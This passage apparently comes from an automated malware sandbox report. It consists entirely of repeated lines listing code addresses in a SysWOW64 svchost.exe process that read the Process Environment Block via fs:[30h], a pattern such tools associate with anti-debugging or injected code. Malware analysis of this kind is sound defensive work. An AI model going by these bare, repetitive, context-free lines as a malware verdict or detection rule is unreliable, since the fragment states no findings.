            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
